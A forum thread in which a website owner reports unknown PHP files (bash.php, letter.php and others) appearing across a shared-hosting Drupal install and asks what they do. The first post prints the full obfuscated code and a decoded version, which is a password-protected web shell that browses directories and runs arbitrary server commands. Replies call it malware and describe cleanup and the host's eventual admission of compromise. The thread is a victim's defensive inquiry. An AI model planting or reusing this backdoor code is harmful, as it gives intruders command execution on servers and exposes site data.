By sevanden on
On 1 of my websites there have been several files, with identical content but different names, appearing in several locations throughout the installation. I verified my local files, those particular files are not present, so I know I have not uploaded them.
The files have names like
- bash.php
- chklist.php
- lasticon.php
- letter.php
- MRTG.php
- Nagios.php
- radusers.php
- reminders.php
- shoppers.php
- toupper.php
The contents of the files is all identical and looks like this:
<?php
define('HELP_VERSION', '1.9');
eval(gzinflate(base64_decode('hZFPa8JAEMXv+RRjEBIP1awxVdpNwFIhhx6C1eYgRTbZkSwkseyutLb63Zs/Fnto6F4W3vvNm9nZ/htT6p2DD0xKdrQtxgtRWuAHYE3dBPnYJR5JZ5Ox4916STJxp45LXMZ2nFiDe8MQO7B7QinUdn/7vFi+LJYbKwqj7Xy9CrfrSrFeB3A6GVCdbjCK/8Da2TadudeK/1Ho+VBwr7P3AL6qpAwZR2lbcRzfzA86w1KLlGm8gwemRAoSWV74Zrh4ioAMZ2a9gmtVuFpFIzJ0YOIQWJesCthL8Ym8xfrsV2K9ci0PWBuYZnswaaaLPKB1WEC10DkG8zRFpeARS4GcjlqRjlokIz8+v/iVQjMZ0GTPjxV2uZpYs+nzIbTt1L92BswVNk/umOpsfAM=')));
header('Content-Type: text/html; charset=UTF-8');
echo '<?xml version="1.0" encoding="UTF-8"?>' . "\n";
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>HELP <?php echo HELP_VERSION ?></title>
</head>
<body>
<h3>HELP <?php echo HELP_VERSION ?></h3>
<?php
error_reporting (E_ALL);
eval(gzinflate(base64_decode('dZLLboMwEEX3fMVUsmLTVH1sQairfEBfK8tBBJzE4lVhJFpV/HttsAkkZoPMnPHx9QDq6iaPM9FABLz8bn8Jit93b1+7j0+KLcPMh1fAGAJw0tBDaV2WSZWBS2OYtjg0E1WWQpxFCeC0DGxwuCyGKkeb5Id6xTGwVYehyiHbjDeN2zGyUXLrsDT0PE8cgaBpvneRavbhzwMYgJ3YrD4S3vATwXtKg0ORVHnA2H2azd62hO5DtvURfgBrUSu1S/rWY87QNfrC6DODSB3zhC8cAFW8M1/eNoYG9sALyVd6pxs9aqN63uyeRTiKgsf8R8hWEivxYbMBIfXyUlskm/2UtuFaPs1Pj2+EGvVe7xy8PnKRxeJFmKk4pknPy2qo5fNwJ96mXUYU+Ac=')));
?>
<form action="<?php echo $_SERVER['PHP_SELF'] ?>" method="post">
<fieldset><legend>Input</legend>
<p>Current working directory:
<b>
<?php
eval(gzinflate(base64_decode('bZDLboMwEEX3fMUUGdlWUJyueWSVqosuIip1EyFEwQirBFu2UVtV+fcaUoqi4I1f9945M+hT6o+iFrowqhPW8hoS4F+qkzUnmOEQzPBurCZoFobwSGnkebxqJeC4hFbzJvExbAEVr4fs7ZCd8PH56M4vTzh3z3g/exPmp5mUNmZlyrALEQ2QB35W9nsp8E9y2uWUwo8HgFRpWweGnQegkRoIEu6+i8DtMVRy6O1KAh3/N5tryByzdTlswr2viEQeTVKlRW8bsvQXmKWLwPhpYK5NhJP8b60N4EYw6I731TjbiYXeuld56Ah08S7eLw==')));
?></b>
</p>
<p>
EXEC: <input type="text" name="takbo" value="<?PHP echo $takbo ?>" size="20" />
PASS: <input type="password" name="lihim" value="<?PHP echo $lihim ?>" size="20" />
Choose new working directory:
<select name="work_dir" onchange="this.form.submit()">
<?php
eval(gzinflate(base64_decode('jVLBboQgEL3zFRNioiYb6Z5dvbQf0A8wMVankZSAAd1N0/jvBZS6bZqwFxjePN68YUgGrtuxk4NAqEBNKC2QJTelP1ob5SUht5HbZJbYo6Vo7AZPOS7mOXwRAP4OGTdtSO7ohm+XK0iLNMAA2I8K6EVNM1cSrp1YsGroT+2GgkGB/YyDhUPY0Pp50RrlDC9cW0jpzwvbNOpG0tKLr4DC4O/KW+m9tkuZWQuUd8063vnwd4hYpp6UOagnSFnq+U+xfph1/NrFDIdqETFagPOC18wsbzZyzvbNgUcrJ6CM2vVsx1DQRy2Qf4z4Rwy6/iXZ3QyjU0z8JGu3PdB1VI7F9EhYV7KSXiiDf39rSb4B')));
?>
</select></p>
<p>
Command: <input type="text" name="command" size="60" />
Enable <code>stderr-trapping?
if ($stderr) echo "checked=\"checked\""; />
Output
eval(gzinflate(base64_decode('dVJda4MwFH3vr7gVaRRst5YxBmJhjPVtHw/ds7h4nbJ8SBLXldH/vlSjtqN7MJiTc889JzdFI6ippABdImMpfiNdBT7lefgzAagKCKbIa7PvsBYE8IsaEqhljaLFI095YdwedQRLUagbZizN82KH7cqKYTAtUBaBlbBqjrVICoVZfgSj5fXqJowPrqSmTGps2Z3K8eD4KTSNEkCl+EJlUrpXqTaqEh+B04y83Iu83dHXYTI5CyI5z4QNA31EX5sclQqde9/wurBWrXlja0TGA3JlMRIB0ajTW0Wcm14LFjYnrMfK1Xq2jIFmZoBiUHzYtFdyAGQa2/69TJIAYZoMRk7kCcw3JHbp/4zGZJ/vMoTZDHqEVWXFw0GH74cO0LFhYQ17du2o3fYf+aH6kqC11iiGgsocx7sd81204H5P+iEtJZSGM10jrTJGy0zp4OxRjjYieHzepg8vT6/3WzuTt+1mfkfaQf8C')));
document.forms[0].command.focus();
I'm not sure where those files came from nor what they do, but this doesn't really look good. I'm wondering if my server may have been compromised. I informed my host and they are still investigating this yet they believe those files are legit and part of a monitoring application they use.
I ran some portions of the file through a decoded and this comes out:
<?php
define('HELP_VERSION', '1.9');
$passwd = array('admin' => 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
if (!isset($_SERVER['PHP_AUTH_USER']) || !isset($_SERVER['PHP_AUTH_PW']) || !isset($passwd[$_SERVER['PHP_AUTH_USER']]) || $passwd[$_SERVER['PHP_AUTH_USER']] != md5($_SERVER['PHP_AUTH_PW']))
{
header('WWW-Authenticate: Basic realm="HELP 1.8"');
header('HTTP/1.0 401 Unauthorized');
$authenticated = true;
echo "<html><head><title>Access Denied</title></head><h1>Access denied</h1><hr><body></body></html>";
exit(0);
}
else
{
$authenticated = true;
}
header('Content-Type: text/html; charset=UTF-8');
echo '<?xml version="1.0" encoding="UTF-8"?>' . "\n";
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>HELP <?php echo HELP_VERSION ?></title>
</head>
<body>
<h3>HELP <?php echo HELP_VERSION ?></h3>
<?php
error_reporting (E_ALL);
$work_dir = empty($_REQUEST['work_dir']) ? '' : $_REQUEST['work_dir'];
$command = empty($_REQUEST['command']) ? '' : $_REQUEST['command'];
$lihim = empty($_REQUEST['lihim']) ? '' : $_REQUEST['lihim'];
$takbo = empty($_REQUEST['takbo']) ? '' : $_REQUEST['takbo'];
$stderr = empty($_REQUEST['stderr']) ? '' : $_REQUEST['stderr'];
if ($work_dir != '') {
if ($command != '') {
if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {
if ($regs[1][0] == '/') {
$new_dir = $regs[1];
}
else {
$new_dir = $work_dir . '/' . $regs[1];
}
if (file_exists($new_dir) && is_dir($new_dir)) {
$work_dir = $new_dir;
}
$command = '';
}
}
}
if ($work_dir != '' && file_exists($work_dir) && is_dir($work_dir)) {
chdir($work_dir);
}
$work_dir = getcwd();
?>
<form action="<?php echo $_SERVER['PHP_SELF'] ?>" method="post">
<fieldset><legend>Input</legend>
<p>Current working directory:
<b>
<?php
$work_dir_splitted = explode('/', substr($work_dir, 1));
echo '<a href="' . $_SERVER['PHP_SELF'] . '?work_dir=/">Root</a>/';
if (!empty($work_dir_splitted[0])) {
$path = '';
for ($i = 0; $i < count($work_dir_splitted); $i++) {
$path .= '/' . $work_dir_splitted[$i];
printf('<a href="%s?work_dir=%s">%s</a>/', $_SERVER['PHP_SELF'], urlencode($path), $work_dir_splitted[$i]);
}
}
?>
</b>
</p>
<p>
EXEC: <input type="text" name="takbo" value="<?PHP echo $takbo ?>" size="20" />
PASS: <input type="password" name="lihim" value="<?PHP echo $lihim ?>" size="20" />
Choose new working directory:
<select name="work_dir" onchange="this.form.submit()">
<?php
$dir_handle = opendir($work_dir);
while ($dir = readdir($dir_handle)) {
if (is_dir($dir)) {
if ($dir == '.') {
echo "<option value=\"$work_dir\" selected=\"selected\">Current Directory</option>\n";
}
elseif ($dir == '..') {
if (strlen($work_dir) == 1) {
}
elseif (strrpos($work_dir, '/') == 0) {
echo "<option value=\"/\">Parent Directory</option>\n";
}
else {
echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"), 1)) ."\">Parent Directory</option>\n";
}
}
else {
if ($work_dir == '/') {
echo "<option value=\"$work_dir$dir\">$dir</option>\n";
}
else {
echo "<option value=\"$work_dir/$dir\">$dir</option>\n";
}
}
}
}
closedir($dir_handle);
?>
</select></p>
<p>
Command: <input type="text" name="command" size="60" />
Enable <code>stderr-trapping?
if ($stderr) echo "checked=\"checked\""; />
Output
function shell_exec2($cmd) {
if (!empty($cmd)){
$fp = popen($cmd,"r"); {
$result = "";
while(!feof($fp)){
$result.=fread($fp,1024);
}
pclose($fp);
}
}
return convert_cyr_string($result,"d","w");
}
if (!empty($command)) {
if ($stderr) {
$tmpfile = tempnam('/tmp', 'ses_6r');
$command .= " > $tmpfile 2>&1; cat $tmpfile; rm $tmpfile";
}
elseif ($command == 'ls') {
$command .= ' -F';
}
if (!empty($takbo) && !empty($lihim)) {
$mycommand = $takbo . " " . $lihim . " ";
}
if (!empty($mycommand)) {
$mycommand .= urlencode($command);
}
else {
$mycommand = $command;
}
echo htmlspecialchars(shell_exec2($mycommand), ENT_COMPAT, 'UTF-8');}
document.forms[0].command.focus();
Comments
Those are virus, the fact
Those are virus, the fact they are in the file system suggesting either your file system is generally writable and/or some one has access to your site through your sites admin login/password, your sites control panel login/password or ftp login/password so it is suggested you can those and clean up the files.
What exactly does this code do?
I am myself pretty convinced this is some sort of malware, possible a backdoor to gain access to the site/server. The less pretty part is that my hosting provider claims those files are part of a logging tool they use to monitor the websites they host and they believe those files are legit, which I doubt.
I'm actually curious as to what this code really allows someone to do ... Can anyone help out on that aspect?
If they are really from the
If they are really from the hosting company I would switch hosting companies.
I raised this issue 3 days
I raised this issue 3 days ago with my hosting company, up until now they are still investigating the matter. It is rather troublesome to say the least ...
I gave them the files, the filenames and even the fully decoded version of the file and still they fail to give a decent response within a reasonable time ...
Persmissions
The permissions on my files and folders are set in such way no-one has write access. The thing is those files appear even in directories that are set read only. This site is on shared hosting and the hosting company is still investigating my issue, and they even hired an external security firm to check everything (so they say).
So, I'm pretty sure that it's not a permissions issue or at least not something I can change further than set everything as restrictive as possible.
I'm still curious as to what this piece of code actually allows one to do on a web server. Hope someone can shed some light on this for me ...
I have this file too!
I think we are hosting on the same server, I've also found some PHP file with the same code you posted above and I've deleted all those file as I think it tries to compromise / hack my site.
The php file I've found named :
it is in the root directory and inside the images folder of Garland and color.module
I hosted my site in web.com.ph and I will contact them about this file, it so happen that I'm searching Google about that code and it pointed me in this thread.
Delete those files immediately
I used to have those files when I'm using Zen Cart. If you are using cPanel, you need to use your file manager to change the folder (especially image folders) permissions to at least 644. And check your users to ensure that there aren't any uninvited guest as your admins or mods.
I'm still new to Drupal so can't advise much but in Zen Cart, we are advised to change our admin folder directory to something not so obvious. For example:
www.mysite.com/admin
change to
www.mysite.com/nf4r823-9faon-cu30
I did both of this and it doesn't come back anymore. You could also use .htaccess too.
.htaccess in use, read only permissions
My setup has .htaccess file setup and all directories were set to read only, all files as well except for the directory sites/default/files where Drupal writes its temp files, yet those files still appeared at random places in the setup.
The hosting company has finally admitted the server was compromised and is about to move all accounts to a clean server, just hope that if people made some backups of their files they will be smart enough to check if any of those files are still in there otherwise we'll be back to square 1.
Same hosting company indeed
Yes indeed we are hosted by the same company, I have raised the issue and tried to make them aware of a possible security breach, however until now I have not received any confirmation that the issue is fixed. They have however responded that they would hire an external security firm to check all the system, so far it doesn't seem to be resolved.
Those are indeed the files and names that you'll get to see, and even if you would remove all write permissions on your directories those files will still appear. There seems to be even a perl variant of this same script that may popup in your CGI directory, it's easy to spot it as it is plain text file and differs from the other files you'd normally find there.
I have postponed the further development of my website until I get more information and some kind of confirmation the issue has been resolved. I don't want to take the risk of putting information of my site's members in the hand of some malicious user.
It would be great if someone could help us understand what those files actually allow to be done, my guess (I'm no expert in PHP or Perl) is that it would allow someone to execute commands on the server...